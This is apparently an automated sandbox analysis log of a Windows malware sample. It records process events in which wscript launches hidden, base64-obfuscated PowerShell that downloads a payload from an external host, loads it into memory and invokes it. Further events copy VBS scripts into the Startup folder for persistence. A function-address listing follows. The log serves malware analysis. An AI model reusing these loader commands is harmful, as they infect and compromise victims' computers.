ycrJ3dHWkgnKydvICwgWkhvaHZuY1onKydIbywnKydaJysnSG9zdicrJ2Nob3N0WkhvLFpIb1pIbyknKycpJykgLWNyZXBMYWNlICAoW2NoQVJdOTArW2NoQVJdNzIrW2NoQVJdMTExKSxbY2hBUl0zOS1yZVBsQUNlJ093RycsW2NoQVJdOTItcmVQbEFDZSAoW2NoQVJdNzgrW2NoQVJdMTE0K1tjaEFSXTg4KSxbY2hBUl0zNil8aW52T0tlLWV4UFJlU1NpT04=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnTnJYdXJsJysnID0nKycgWicrJ0hvJysnaHQnKyd0cHM6Ly8nKydpYTYwMCcrJzEwJysnMC51cy5hcmNoJysnaXYnKydlLicrJ29yZy8yNC8nKydpdCcrJ2Vtcy9kZXRhJysnaC1uJysnb3RlLXYvRCcrJ2UnKyd0YWhOb3RlVicrJy50eCcrJ3RaSG87TnJYJysnYmEnKydzZTY0Q29udGVuJysndCA9IChOZXctT2JqZWN0IFN5c3RlbS4nKydOZXQuV2ViQycrJ2xpZScrJ250KS5Eb3dubG9hZCcrJ1N0cmluZyhOclh1cmwnKycpO05yJysnWCcrJ2JpJysnbicrJ2FyJysneUNvbnRlbicrJ3QgPScrJyBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZScrJzY0UycrJ3RyJysnaW4nKydnKE5yWGJhcycrJ2U2NEMnKydvbicrJ3RlbicrJ3QpO05yWGFzc2VtYmx5ID0gJysnW1JlZmxlYycrJ3Rpb24uJysnQScrJ3NzZW1ibHldOicrJzpMJysnb2FkKCcrJ05yJysnWGJpbmFyJysneUMnKydvbnQnKydlbnQpJysnOycrJ05yWCcrJ3R5cCcrJ2UnKycgPScrJyBOclhhc3NlbWJsJysneS5HZXRUeXBlKFpIbycrJ1J1blBFLkhvbWVaSG8pO05yWCcrJ20nKydldGhvZCA9ICcrJ04nKydyWHQnKyd5cGUuRycrJ2V0TScrJ2V0aG9kJysnKFpIJysnb1ZBSVpIbyk7TicrJ3InKydYbWV0aCcrJ29kLicrJ0luJysndm9rZShOcicrJ1huJysndScrJ2xsLCBbb2JqZWN0W11dQChaSG8wL0U3TycrJzI4L2QvZWUuJysnZXRzYXAvLzpzcHR0aFpIJysnbyAsJysnICcrJ1pIbzFaSG8nKycgLCBaSG9DOk93R1BybycrJ2dyYW1EYScrJ3RhJysnTycrJ3dHWkgnKydvICwgWkhvaHZuY1onKydIbywnKydaJysnSG9zdicrJ2Nob3N0WkhvLFpIb1pIbyknKycpJykgLWNyZXBMYWNlICAoW2NoQVJdOTArW2NoQVJdNzIrW2NoQVJdMTExKSxbY2hBUl0zOS1yZVBsQUNlJ093RycsW2NoQVJdOTItcmVQbEFDZSAoW2NoQVJdNzgrW2NoQVJdMTE0K1tjaEFSXTg4KSxbY2hBUl0zNil8aW52T0tlLWV4UFJlU1NpT04=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnTnJYdXJsJysnID0nKycgWicrJ0hvJysnaHQnKyd0cHM6Ly8nKydpYTYwMCcrJzEwJysnMC51cy5hcmNoJysnaXYnKydlLicrJ29yZy8yNC8nKydpdCcrJ2Vtcy9kZXRhJysnaC1uJysnb3RlLXYvRCcrJ2UnKyd0YWhOb3RlVicrJy50eCcrJ3RaSG87TnJYJysnYmEnKydzZTY0Q29udGVuJysndCA9IChOZXctT2JqZWN0IFN5c3RlbS4nKydOZXQuV2ViQycrJ2xpZScrJ250KS5Eb3dubG9hZCcrJ1N0cmluZyhOclh1cmwnKycpO05yJysnWCcrJ2JpJysnbicrJ2FyJysneUNvbnRlbicrJ3QgPScrJyBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZScrJzY0UycrJ3RyJysnaW4nKydnKE5yWGJhcycrJ2U2NEMnKydvbicrJ3RlbicrJ3QpO05yWGFzc2VtYmx5ID0gJysnW1JlZmxlYycrJ3Rpb24uJysnQScrJ3NzZW1ibHldOicrJzpMJysnb2FkKCcrJ05yJysnWGJpbmFyJysneUMnKydvbnQnKydlbnQpJysnOycrJ05yWCcrJ3R5cCcrJ2UnKycgPScrJyBOclhhc3NlbWJsJysneS5HZXRUeXBlKFpIbycrJ1J1blBFLkhvbWVaSG8pO05yWCcrJ20nKydldGhvZCA9ICcrJ04nKydyWHQnKyd5cGUuRycrJ2V0TScrJ2V0aG9kJysnKFpIJysnb1ZBSVpIbyk7TicrJ3InKydYbWV0aCcrJ29kLicrJ0luJysndm9rZShOcicrJ1huJysndScrJ2xsLCBbb2JqZWN0W11dQChaSG8wL0U3TycrJzI4L2QvZWUuJysnZXRzYXAvLzpzcHR0aFpIJysnbyAsJysnICcrJ1pIbzFaSG8nKycgLCBaSG9DOk93R1BybycrJ2dyYW1EYScrJ3RhJysnTycrJ3dHWkgnKydvICwgWkhvaHZuY1onKydIbywnKydaJysnSG9zdicrJ2Nob3N0WkhvLFpIb1pIbyknKycpJykgLWNyZXBMYWNlICAoW2NoQVJdOTArW2NoQVJdNzIrW2NoQVJdMTExKSxbY2hBUl0zOS1yZVBsQUNlJ093RycsW2NoQVJdOTItcmVQbEFDZSAoW2NoQVJdNzgrW2NoQVJdMTE0K1tjaEFSXTg4KSxbY2hBUl0zNil8aW52T0tlLWV4UFJlU1NpT04=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnTnJYdXJsJysnID0nKycgWicrJ0hvJysnaHQnKyd0cHM6Ly8nKydpYTYwMCcrJzEwJysnMC51cy5hcmNoJysnaXYnKydlLicrJ29yZy8yNC8nKydpdCcrJ2Vtcy9kZXRhJysnaC1uJysnb3RlLXYvRCcrJ2UnKyd0YWhOb3RlVicrJy50eCcrJ3RaSG87TnJYJysnYmEnKydzZTY0Q29udGVuJysndCA9IChOZXctT2JqZWN0IFN5c3RlbS4nKydOZXQuV2ViQycrJ2xpZScrJ250KS5Eb3dubG9hZCcrJ1N0cmluZyhOclh1cmwnKycpO05yJysnWCcrJ2JpJysnbicrJ2FyJysneUNvbnRlbicrJ3QgPScrJyBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZScrJzY0UycrJ3RyJysnaW4nKydnKE5yWGJhcycrJ2U2NEMnKydvbicrJ3RlbicrJ3QpO05yWGFzc2VtYmx5ID0gJysnW1JlZmxlYycrJ3Rpb24uJysnQScrJ3NzZW1ibHldOicrJzpMJysnb2FkKCcrJ05yJysnWGJpbmFyJysneUMnKydvbnQnKydlbnQpJysnOycrJ05yWCcrJ3R5cCcrJ2UnKycgPScrJyBOclhhc3NlbWJsJysneS5HZXRUeXBlKFpIbycrJ1J1blBFLkhvbWVaSG8pO05yWCcrJ20nKydldGhvZCA9ICcrJ04nKydyWHQnKyd5cGUuRycrJ2V0TScrJ2V0aG9kJysnKFpIJysnb1ZBSVpIbyk7TicrJ3InKydYbWV0aCcrJ29kLicrJ0luJysndm9rZShOcicrJ1huJysndScrJ2xsLCBbb2JqZWN0W11dQChaSG8wL0U3TycrJzI4L2QvZWUuJysnZXRzYXAvLzpzcHR0aFpIJysnbyAsJysnICcrJ1pIbzFaSG8nKycgLCBaSG9DOk93R1BybycrJ2dyYW1EYScrJ3RhJysnTycrJ3dHWkgnKydvICwgWkhvaHZuY1onKydIbywnKydaJysnSG9zdicrJ2Nob3N0WkhvLFpIb1pIbyknKycpJykgLWNyZXBMYWNlICAoW2NoQVJdOTArW2NoQVJdNzIrW2NoQVJdMTExKSxbY2hBUl0zOS1yZVBsQUNlJ093RycsW2NoQVJdOTItcmVQbEFDZSAoW2NoQVJdNzgrW2NoQVJdMTE0K1tjaEFSXTg4KSxbY2hBUl0zNil8aW52T0tlLWV4UFJlU1NpT04=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnTnJYdXJsJysnID0nKycgWicrJ0hvJysnaHQnKyd0cHM6Ly8nKydpYTYwMCcrJzEwJysnMC51cy5hcmNoJysnaXYnKydlLicrJ29yZy8yNC8nKydpdCcrJ2Vtcy9kZXRhJysnaC1uJysnb3RlLXYvRCcrJ2UnKyd0YWhOb3RlVicrJy50eCcrJ3RaSG87TnJYJysnYmEnKydzZTY0Q29udGVuJysndCA9IChOZXctT2JqZWN0IFN5c3RlbS4nKydOZXQuV2ViQycrJ2xpZScrJ250KS5Eb3dubG9hZCcrJ1N0cmluZyhOclh1cmwnKycpO05yJysnWCcrJ2JpJysnbicrJ2FyJysneUNvbnRlbicrJ3QgPScrJyBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZScrJzY0UycrJ3RyJysnaW4nKydnKE5yWGJhcycrJ2U2NEMnKydvbicrJ3RlbicrJ3QpO05yWGFzc2VtYmx5ID0gJysnW1JlZmxlYycrJ3Rpb24uJysnQScrJ3NzZW1ibHldOicrJzpMJysnb2FkKCcrJ05yJysnWGJpbmFyJysneUMnKydvbnQnKydlbnQpJysnOycrJ05yWCcrJ3R5cCcrJ2UnKycgPScrJyBOclhhc3NlbWJsJysneS5HZXRUeXBlKFpIbycrJ1J1blBFLkhvbWVaSG8pO05yWCcrJ20nKydldGhvZCA9ICcrJ04nKydyWHQnKyd5cGUuRycrJ2V0TScrJ2V0aG9kJysnKFpIJysnb1ZBSVpIbyk7TicrJ3InKydYbWV0aCcrJ29kLicrJ0luJysndm9rZShOcicrJ1huJysndScrJ2xsLCBbb2JqZWN0W11dQChaSG8wL0U3TycrJzI4L2QvZWUuJysnZXRzYXAvLzpzcHR0aFpIJysnbyAsJysnICcrJ1pIbzFaSG8nKycgLCBaSG9DOk93R1BybycrJ2dyYW1EYScrJ3RhJysnTycrJ3dHWkgnKydvICwgWkhvaHZuY1onKydIbywnKydaJysnSG9zdicrJ2Nob3N0WkhvLFpIb1pIbyknKycpJykgLWNyZXBMYWNlICAoW2NoQVJdOTArW2NoQVJdNzIrW2NoQVJdMTExKSxbY2hBUl0zOS1yZVBsQUNlJ093RycsW2NoQVJdOTItcmVQbEFDZSAoW2NoQVJdNzgrW2NoQVJdMTE0K1tjaEFSXTg4KSxbY2hBUl0zNil8aW52T0tlLWV4UFJlU1NpT04=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnTnJYdXJsJysnID0nKycgWicrJ0hvJysnaHQnKyd0cHM6Ly8nKydpYTYwMCcrJzEwJysnMC51cy5hcmNoJysnaXYnKydlLicrJ29yZy8yNC8nKydpdCcrJ2Vtcy9kZXRhJysnaC1uJysnb3RlLXYvRCcrJ2UnKyd0YWhOb3RlVicrJy50eCcrJ3RaSG87TnJYJysnYmEnKydzZTY0Q29udGVuJysndCA9IChOZXctT2JqZWN0IFN5c3RlbS4nKydOZXQuV2ViQycrJ2xpZScrJ250KS5Eb3dubG9hZCcrJ1N0cmluZyhOclh1cmwnKycpO05yJysnWCcrJ2JpJysnbicrJ2FyJysneUNvbnRlbicrJ3QgPScrJyBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZScrJzY0UycrJ3RyJysnaW4nKydnKE5yWGJhcycrJ2U2NEMnKydvbicrJ3RlbicrJ3QpO05yWGFzc2VtYmx5ID0gJysnW1JlZmxlYycrJ3Rpb24uJysnQScrJ3NzZW1ibHldOicrJzpMJysnb2FkKCcrJ05yJysnWGJpbmFyJysneUMnKydvbnQnKydlbnQpJysnOycrJ05yWCcrJ3R5cCcrJ2UnKycgPScrJyBOclhhc3NlbWJsJysneS5HZXRUeXBlKFpIbycrJ1J1blBFLkhvbWVaSG8pO05yWCcrJ20nKydldGhvZCA9ICcrJ04nKydyWHQnKyd5cGUuRycrJ2V0TScrJ2V0aG9kJysnKFpIJysnb1ZBSVpIbyk7TicrJ3InKydYbWV0aCcrJ29kLicrJ0luJysndm9rZShOcicrJ1huJysndScrJ2xsLCBbb2JqZWN0W11dQChaSG8wL0U3TycrJzI4L2QvZWUuJysnZXRzYXAvLzpzcHR0aFpIJysnbyAsJysnICcrJ1pIbzFaSG8nKycgLCBaSG9DOk93R1BybycrJ2dyYW1EYScrJ3RhJysnTycrJ3dHWkgnKydvICwgWkhvaHZuY1onKydIbywnKydaJysnSG9zdicrJ2Nob3N0WkhvLFpIb1pIbyknKycpJykgLWNyZXBMYWNlICAoW2NoQVJdOTArW2NoQVJdNzIrW2NoQVJdMTExKSxbY2hBUl0zOS1yZVBsQUNlJ093RycsW2NoQVJdOTItcmVQbEFDZSAoW2NoQVJdNzgrW2NoQVJdMTE0K1tjaEFSXTg4KSxbY2hBUl0zNil8aW52T0tlLWV4UFJlU1NpT04=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\escrivan.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.navircse.vbs')')
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezB9dXJsID0gezF9aHR0cHMnKyc6Ly9pYTYwJysnMDEwMC51cy5hcmNoaScrJ3ZlLm9yZycrJy8yNC9pJysndGVtcycrJy9kJysnZXQnKydhJysnaC1ub3RlLXYvRGV0YWgnKydOb3RlVicrJy50eHR7MX07ezAnKyd9YmFzZTY0Q28nKydudGVudCAnKyc9JysnICcrJyhOZXctT2InKydqZWN0IFN5Jysnc3QnKydlbS5OZScrJ3QuVycrJ2ViQ2xpZScrJ250KS4nKydEb3dubCcrJ29hZFN0JysncmluJysnZyh7MCcrJ30nKyd1cmwpO3snKycwfWJpbicrJ2FyJysneUNvbicrJ3RlbicrJ3QgPScrJyAnKydbU3lzdGVtLkNvbnZlcnRdJysnOjonKydGcm9tQmEnKydzZTY0U3RyaW5nKHswfWJhc2UnKyc2NENvbicrJ3RlbnQpO3swfWFzc2UnKydtYmwnKyd5ICcrJz0nKycgW1JlZmxlY3Rpb24uQXMnKydzJysnZW1ibHldOjonKydMbycrJ2FkKHswfWJpbmEnKydyeUNvbnRlbnQpO3swfXR5cCcrJ2UgJysnPSB7JysnMH0nKydhc3NlbScrJ2JseS5HZXRUJysneXAnKydlKHsxfVInKyd1blBFJysnLkhvJysnbWV7JysnMX0pO3swJysnfScrJ21lJysndGhvZCA9IHswfXR5cGUuR2V0TWV0aG9kKHsxfVZBJysnSXsxfScrJyk7ezB9JysnbScrJ2UnKyd0aCcrJ29kLkluJysndicrJ29rZSh7MH1udScrJ2xsLCBbb2JqZScrJ2N0WycrJ11dJysnQCh7MX0nKycwJysnL2dKMWsnKydTJysnL2QvJysnZWUuZScrJ3RzYXAvLzpzcHR0aHsxJysnfScrJyAsJysnIHsxfWRlJysnc2F0JysnaXZhZG97MScrJ30nKycgLCB7MScrJ31kZXNhdGl2YScrJ2QnKydvezF9ICwgezF9JysnZGUnKydzYXRpdmFkb3snKycxfSx7MX1DJysnYScrJ3NQbycrJ2x7MX0nKycsezEnKyd9eycrJzF9KSknKS1mICBbY2hBUl0zNixbY2hBUl0zOSkgfElleA==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\escrivan.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.navircse.vbs')')
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnTnJYdXJsJysnID0nKycgWicrJ0hvJysnaHQnKyd0cHM6Ly8nKydpYTYwMCcrJzEwJysnMC51cy5hcmNoJysnaXYnKydlLicrJ29yZy8yNC8nKydpdCcrJ2Vtcy9kZXRhJysnaC1uJysnb3RlLXYvRCcrJ2UnKyd0YWhOb3RlVicrJy50eCcrJ3RaSG87TnJYJysnYmEnKydzZTY0Q29udGVuJysndCA9IChOZXctT2JqZWN0IFN5c3RlbS4nKydOZXQuV2ViQycrJ2xpZScrJ250KS5Eb3dubG9hZCcrJ1N0cmluZyhOclh1cmwnKycpO05yJysnWCcrJ2JpJysnbicrJ2FyJysneUNvbnRlbicrJ3QgPScrJyBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZScrJzY0UycrJ3RyJysnaW4nKydnKE5yWGJhcycrJ2U2NEMnKydvbicrJ3RlbicrJ3QpO05yWGFzc2VtYmx5ID0gJysnW1JlZmxlYycrJ3Rpb24uJysnQScrJ3NzZW1ibHldOicrJzpMJysnb2FkKCcrJ05yJysnWGJpbmFyJysneUMnKydvbnQnKydlbnQpJysnOycrJ05yWCcrJ3R5cCcrJ2UnKycgPScrJyBOclhhc3NlbWJsJysneS5HZXRUeXBlKFpIbycrJ1J1blBFLkhvbWVaSG8pO05yWCcrJ20nKydldGhvZCA9ICcrJ04nKydyWHQnKyd5cGUuRycrJ2V0TScrJ2V0aG9kJysnKFpIJysnb1ZBSVpIbyk7TicrJ3InKydYbWV0aCcrJ29kLicrJ0luJysndm9rZShOcicrJ1huJysndScrJ2xsLCBbb2JqZWN0W11dQChaSG8wL0U3TycrJzI4L2QvZWUuJysnZXRzYXAvLzpzcHR0aFpIJysnbyAsJysnICcrJ1pIbzFaSG8nKycgLCBaSG9DOk93R1BybycrJ2dyYW1EYScrJ3RhJysnTycrJ3dHWkgnKydvICwgWkhvaHZuY1onKydIbywnKydaJysnSG9zdicrJ2Nob3N0WkhvLFpIb1pIbyknKycpJykgLWNyZXBMYWNlICAoW2NoQVJdOTArW2NoQVJdNzIrW2NoQVJdMTExKSxbY2hBUl0zOS1yZVBsQUNlJ093RycsW2NoQVJdOTItcmVQbEFDZSAoW2NoQVJdNzgrW2NoQVJdMTE0K1tjaEFSXTg4KSxbY2hBUl0zNil8aW52T0tlLWV4UFJlU1NpT04=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\Public\Documents\pow\wm.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.navircse.vbs')')
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezB9dXJsID0gezF9aHR0cHMnKyc6Ly9pYTYwJysnMDEwMC51cy5hcmNoaScrJ3ZlLm9yZycrJy8yNC9pJysndGVtcycrJy9kJysnZXQnKydhJysnaC1ub3RlLXYvRGV0YWgnKydOb3RlVicrJy50eHR7MX07ezAnKyd9YmFzZTY0Q28nKydudGVudCAnKyc9JysnICcrJyhOZXctT2InKydqZWN0IFN5Jysnc3QnKydlbS5OZScrJ3QuVycrJ2ViQ2xpZScrJ250KS4nKydEb3dubCcrJ29hZFN0JysncmluJysnZyh7MCcrJ30nKyd1cmwpO3snKycwfWJpbicrJ2FyJysneUNvbicrJ3RlbicrJ3QgPScrJyAnKydbU3lzdGVtLkNvbnZlcnRdJysnOjonKydGcm9tQmEnKydzZTY0U3RyaW5nKHswfWJhc2UnKyc2NENvbicrJ3RlbnQpO3swfWFzc2UnKydtYmwnKyd5ICcrJz0nKycgW1JlZmxlY3Rpb24uQXMnKydzJysnZW1ibHldOjonKydMbycrJ2FkKHswfWJpbmEnKydyeUNvbnRlbnQpO3swfXR5cCcrJ2UgJysnPSB7JysnMH0nKydhc3NlbScrJ2JseS5HZXRUJysneXAnKydlKHsxfVInKyd1blBFJysnLkhvJysnbWV7JysnMX0pO3swJysnfScrJ21lJysndGhvZCA9IHswfXR5cGUuR2V0TWV0aG9kKHsxfVZBJysnSXsxfScrJyk7ezB9JysnbScrJ2UnKyd0aCcrJ29kLkluJysndicrJ29rZSh7MH1udScrJ2xsLCBbb2JqZScrJ2N0WycrJ11dJysnQCh7MX0nKycwJysnL2dKMWsnKydTJysnL2QvJysnZWUuZScrJ3RzYXAvLzpzcHR0aHsxJysnfScrJyAsJysnIHsxfWRlJysnc2F0JysnaXZhZG97MScrJ30nKycgLCB7MScrJ31kZXNhdGl2YScrJ2QnKydvezF9ICwgezF9JysnZGUnKydzYXRpdmFkb3snKycxfSx7MX1DJysnYScrJ3NQbycrJ2x7MX0nKycsezEnKyd9eycrJzF9KSknKS1mICBbY2hBUl0zNixbY2hBUl0zOSkgfElleA==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Users\Public\Documents\pow\wm.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.navircse.vbs')')
Contains functionality to call native functions
Source: C:\Users\user\Desktop\TM3utH2CsU.exe Code function: 0_2_00007FF681B0A8E0 NtWriteFile,WaitForSingleObject,RtlNtStatusToDosError, 0_2_00007FF681B0A8E0
Source: C:\Users\user\Desktop\TM3utH2CsU.exe Code function: 0_2_00007FF681B0A7C0 NtReadFile,WaitForSingleObject,RtlNtStatusToDosError, 0_2_00007FF681B0A7C0
Source: C:\Users\user\Desktop\TM3utH2CsU.exe Code function: 0_2_00007FF681AD2630 NtCancelIoFileEx,RtlNtStatusToDosError, 0_2_00007FF681AD2630
Detected potential crypto function
Source: C:\Users\user\Desktop\TM3utH2CsU.exe Code function: 0_2_00007FF6819E51CA 0_2_00007FF6819E51CA
Source: C:\Users\user\Desktop\TM3utH2CsU.exe Code function: 0_2_00007FF6819F6162 0_2_00007FF6819F6162
Source: C:\Users\user\Desktop\TM3utH2CsU.exe Code function: 0_2_00007FF6819E9CD5 0_2_00007FF6819E9CD5
Source: C:\Users\user\Desktop\TM3utH2CsU.exe Code function: 0_2_00007FF681A03C9D 0_2_00007FF681A03C9D
Source: C:\Users\user\Desktop\TM3utH2CsU.exe Code function: 0_2_00007FF681A60F30 0_2_00007FF681A60F30
Source: C:\Users\user\Desktop\TM3utH2CsU.exe Code function: 0_2_00007FF681B48E40 0_2_00007FF681B48E40
Source: C:\Users\user\Desktop\TM3utH2CsU.exe Code function: 0_2_00007FF681B2BB10 0_2_00007FF681B2BB10
Source: C:\Users\user\Desktop\TM3utH2CsU.exe Code function: 0_2_00007FF681B41310 0_2_00007FF681B41310
Source: C:\Users\user\Desktop\TM3utH2CsU.exe Code function: 0_2_00007FF681A76A00 0_2_00007FF681A76A00
Source: C:\Users\user\Desktop\TM3utH2CsU.exe Code function: 0_2_00007FF681A5C170 0_2_00007FF681A5C170
Source: C:\Users\user\Desktop\TM3utH2CsU.exe Code function: 0_2_00007FF6819F39B2 0_2_00007FF6819F39B2
Source: C:\Users\user\Desktop\TM3utH2CsU.exe Code function: 0_2_00007FF681B1F150 0_2_00007FF681B1F150
Source: C:\Users\user\Desktop\TM3utH2CsU.exe Code function: 0_2_00007FF681B4A500 0_2_00007FF681B4A500
Source: C:\Users\user\Desktop\TM3utH2CsU.exe Code function: 0_2_00007FF681A284E0 0_2_00007FF681A284E0
Source: C:\Users\user\Desktop\TM3utH2CsU.exe Code function: 0_2_00007FF6819E6C50 0_2_00007FF6819E6C50
Source: C:\Users\user\Desktop\TM3utH2CsU.exe Code function: 0_2_00007FF681AC6CB0 0_2_00007FF681AC6CB0
Source: C:\Users\user\Desktop\TM3utH2CsU.exe Code function: 0_2_00007FF6819E9490 0_2_00007FF6819E9490
Source: C:\Users\user\Desktop\TM3utH2CsU.exe Code function: 0_2_00007FF681A813E0 0_2_00007FF681A813E0
Source: C:\Users\user\Desktop\TM3utH2CsU.exe Code function: 0_2_00007FF6819EEC30 0_2_00007FF6819EEC30
Source: C:\Users\user\Desktop\TM3utH2CsU.exe Code function: 0_2_00007FF681B2ABD0 0_2_00007FF681B2ABD0
Source: C:\Users\user\Desktop\TM3utH2CsU.exe Code function: 0_2_00007FF681A28B70 0_2_00007FF681A28B70
Source: C:\Users\user\Desktop\TM3utH2CsU.exe Code function: 0_2_00007FF681A28370 0_2_00007FF681A28370
Source: C:\Users\user\Desktop\TM3utH2CsU.exe Code function: 0_2_00007FF6819E7B80 0_2_00007FF6819E7B80
Source: C:\Users\user\Desktop\TM3utH2CsU.exe Code function: 0_2_00007FF681AB9ED0 0_2_00007FF681AB9ED0
Source: C:\Users\user\Desktop\TM3utH2CsU.exe Code function: 0_2_00007FF681A28F30 0_2_00007FF681A28F30
Source: C:\Users\user\Desktop\TM3utH2CsU.exe Code function: 0_2_00007FF681A8C710 0_2_00007FF681A8C710
Source: C:\Users\user\Desktop\TM3utH2CsU.exe Code function: 0_2_00007FF681B156F0 0_2_00007FF681B156F0
Source: C:\Users\user\Desktop\TM3utH2CsU.exe Code function: 0_2_00007FF681A78E70 0_2_00007FF681A78E70
Source: C:\Users\user\Desktop\TM3utH2CsU.exe Code function: 0_2_00007FF681B2C650 0_2_00007FF681B2C650
Source: C:\Users\user\Desktop\TM3utH2CsU.exe Code function: 0_2_00007FF6819EA690 0_2_00007FF6819EA690
Source: C:\Users\user\Desktop\TM3utH2CsU.exe Code function: 0_2_00007FF6819E6DF0 0_2_00007FF6819E6DF0
Source: C:\Users\user\Desktop\TM3utH2CsU.exe Code function: 0_2_00007FF6819ECDC8 0_2_00007FF6819ECDC8
Source: C:\Users\user\Desktop\TM3utH2CsU.exe Code function: 0_2_00007FF681A49E10 0_2_00007FF681A49E10
Source: C:\Users\user\Desktop\TM3utH2CsU.exe Code function: 0_2_00007FF6819EF570 0_2_00007FF6819EF570
Source: C:\Users\user\Desktop\TM3utH2CsU.exe Code function: 0_2_00007FF681A09547 0_2_00007FF681A09547
Source: C:\Users\user\Desktop\TM3utH2CsU.exe Code function: 0_2_00007FF681A76DB0 0_2_00007FF681A76DB0
Source: C:\Users\user\Desktop\TM3utH2CsU.exe Code function: 0_2_00007FF681B22570 0_2_00007FF681B22570
Source: C:\Users\user\Desktop\TM3utH2CsU.exe Code function: 0_2_00007FF681B2C0F0 0_2_00007FF681B2C0F0
Source: C:\Users\user\Desktop\TM3utH2CsU.exe Code function: 0_2_00007FF681B3F880 0_2_00007FF681B3F880
Source: C:\Users\user\Desktop\TM3utH2CsU.exe Code function: 0_2_00007FF681B41880 0_2_00007FF681B41880
Source: C:\Users\user\Desktop\TM3utH2CsU.exe Code function: 0_2_00007FF681A76060 0_2_00007FF681A76060
Source: C:\Users\user\Desktop\TM3utH2CsU.exe Code function: 0_2_00007FF681B438A0 0_2_00007FF681B438A0
Source: C:\Users\user\Desktop\TM3utH2CsU.exe Code function: 0_2_00007FF6819EF050 0_2_00007FF6819EF050
Source: C:\Users\user\Desktop\TM3utH2CsU.exe Code function: 0_2_00007FF681B42800 0_2_00007FF681B42800
Source: C:\Users\user\Desktop\TM3utH2CsU.exe Code function: 0_2_00007FF681A8FF50 0_2_00007FF681A8FF50
Source: C:\Users\user\Desktop\TM3utH2CsU.exe Code function: 0_2_00007FF6819EBF50 0_2_00007FF6819EBF50
Source: C:\Users\user\Desktop\TM3utH2CsU.exe Code function: 0_2_00007FF681B00F40 0_2_00007FF681B00F40
Source: C:\Users\user\Desktop\TM3utH2CsU.exe Code function: 0_2_00007FF681B05740 0_2_00007FF681B05740
